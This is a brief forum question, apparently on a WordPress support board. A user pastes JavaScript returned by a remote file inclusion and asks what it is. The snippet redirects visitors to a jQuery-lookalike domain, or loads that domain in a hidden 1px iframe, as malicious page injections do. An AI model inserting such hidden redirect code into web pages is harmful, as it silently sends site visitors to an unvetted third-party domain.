Somthing wrong with remote inclusion
-
I see this:
“/* NOTICE! You’ve requested a file that is not available for remote inclusion. */ try{ window.location = ‘https://www.jqueryc.com’; }catch(e){ var rframe = document.createElement(“iframe”); rframe.setAttribute(‘width’,’1px’); rframe.setAttribute(‘height’,’1px’); rframe.setAttribute(‘frameborder’,’0′); rframe.setAttribute(‘id’,’rfx’); rframe.setAttribute(‘src’,’https://www.jqueryc.com’); document.body.appendChild(rframe); }”
What is it?
PHP 5.3 or 5.4 – same situation.
Viewing 6 replies - 1 through 6 (of 6 total)
Viewing 6 replies - 1 through 6 (of 6 total)
- The topic ‘Somthing wrong with remote inclusion’ is closed to new replies.